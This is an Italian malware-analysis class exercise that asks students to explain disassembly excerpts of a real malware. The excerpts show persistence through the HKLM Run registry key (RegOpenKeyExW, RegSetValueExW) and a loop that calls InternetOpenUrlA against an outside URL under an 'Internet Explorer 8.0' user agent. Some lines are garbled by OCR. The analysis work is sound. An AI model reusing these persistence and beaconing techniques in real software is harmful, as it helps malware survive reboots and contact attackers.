Pratica S11/L1

Con riferimento agli estratti di un malware reale, rispondere alle seguenti domande:

Descrivere come il malware ottiene la persistenza, evidenziando il codice assembly dove le relative istruzioni e chiamate di funzioni vengono eseguite

📋 Identificare il client software utilizzato dal malware per la connessione ad Internet

Identificare l'URL al quale il malware tenta di connettersi ed evidenziare la chiamata di funzione che permette al malware di connettersi ad un URL.

0040286F push 2; samDesired

00402871 push eax; ulOptions

00402872 push offset Subkey; "Software\\Microsoft\\Windows\\CurrentVersion\\Run"

00402877 push HKEY_LOCAL_MACHINE; hKey

0040287C call esi; RegOpenKeyExW

0040287E test eax, eax

00402880 jnz short loc_4028C5

00402882

00402882 loc 402882:

00402882 lea ecx, [esp+424h+Data]

00402886 push ecx, ; lpString

00402887 mov bl, 1

00402889 call ds:lstrlenW

0040288F lea edx, [eax+eax+2]

00402893 push edx; cbData

00402894 mov edx, [esp+428h+hKey]

00402898 lea eax, [esp+428h+Data]

0040289C push eax; lpData

0040289D push 1; dwType

0040289F push 0; Reserved

004028A1 lea ecx, [esp+434h+ValueName]

004028A8 push ecx; lpValueName

004028A9 push edx; hKey

004028AA call ds:RegSetValueExW

.text:00401150

.text:00401150

.text:00401150; DWORD __stdcall StartAddress(LPVOID)

.text:00401150

StartAddress proc near ; Data XREF: sub_401040+ECto

.text:00401150 push esi

.text:00401151 push edi

.text:00401152 push 0 ; dwFlags

.text:00401154 push 0 ; lpszProxyBypass

.text:00401156 push 0 ; lpszProxy

.text:00401158 push 1 ; dwAccessType

.text:0040115A push offset szAgent ; "Internet Explorer 8.0"

.text:0040115F call ds:InternetOpenA

.text:00401165 mov edi, ds:InternetOpenUrlA

.text:0040116B mov esi, eax

.text:0040116D

.text:0040116D loc_40116D: ; CODE XREF: StartAddress+30 \(j \)

.text:0040116D push 0 ; dwContent

 $.text: 00401174 \qquad \quad push \quad 0 \quad \ ; \ dw Headers Length \\$

.text:00401176 push 0 ; lpszHeaders

.text:00401178 push offset szUrl ; "http://www.malware12com

.text:0040117D push esi ; hInternet

.text:0040117E call edi; InternetOpenurlA

.text:00401180 jmp short loc_40116D

.text:00401180 StartAddress endp

.text:00401180

.text:00401180